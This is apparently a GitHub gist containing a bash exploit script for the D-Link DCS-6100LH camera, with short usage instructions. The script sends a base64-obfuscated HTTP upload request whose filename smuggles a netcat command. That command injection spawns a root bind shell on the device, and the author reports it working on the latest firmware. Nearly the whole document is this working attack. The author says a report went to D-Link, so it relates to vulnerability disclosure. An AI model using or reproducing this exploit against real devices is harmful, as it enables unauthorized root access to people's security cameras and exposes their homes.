@grocid

grocid/spl0it.md Secret

Created November 10, 2023 20:54

Gaining root shell on D-Link DCS-6100LH

Applies to HW Ver A1

#!/bin/bash

function pwn_thy_cam()
{
    echo UE9TVCAvZ29mb3JtL2Zvcm1VcGxvYWRGaWxlVGVzdCBIVFRQLzEuMQ0KSG9zdDogMTkyLjE2OC4wLjIwDQpDb250ZW50LUxlbmd0aDogMjg5DQpDYWNoZS1Db250cm9sOiBtYXgtYWdlPTANClVwZ3JhZGUtSW5zZWN1cmUtUmVxdWVzdHM6IDENCk9yaWdpbjogaHR0cDovLzE5Mi4xNjguMC4yMA0KQ29udGVudC1UeXBlOiBtdWx0aXBhcnQvZm9ybS1kYXRhOyBib3VuZGFyeT0tLS0tV2ViS2l0Rm9ybUJvdW5kYXJ5QUNKSmI0R1BXWUFFZEE3aQ0KDQotLS0tLS1XZWJLaXRGb3JtQm91bmRhcnlBQ0pKYjRHUFdZQUVkQTdpDQpDb250ZW50LURpc3Bvc2l0aW9uOiBmb3JtLWRhdGE7IG5hbWU9ImZpbGV1cGxvYWQiOyBmaWxlbmFtZT0idGVzdCBgbmMgLWxwIDg4ODggLWUgJFNIRUxMYCINCg0KZ3JvY2lkAAANCi0tLS0tLVdlYktpdEZvcm1Cb3VuZGFyeUFDSkpiNEdQV1lBRWRBN2kNCkNvbnRlbnQtRGlzcG9zaXRpb246IGZvcm0tZGF0YTsgbmFtZT0idXBkYXRlIg0KDQp1cGRhdGUNCi0tLS0tLVdlYktpdEZvcm1Cb3VuZGFyeUFDSkpiNEdQV1lBRWRBN2ktLQ0KDQo= | base64 -d | nc 192.168.0.20 80 > /dev/null 2>&1 &
}

# Let's pwn it
echo "[ ] Setting up shell..."
pwn_thy_cam

# This is the bind shell
echo "Try out your shell by typing"
echo "nc 192.168.0.20 8888"

Put the device in recovery mode, connect to the camera's Wi-Fi and run the code above. This will spawn a root shell. Applies to all firmware versions I have tried, including the latest 1.04.05 (3.5.23-b01).

A report has been submitted to D-Link. Please do not distribute.
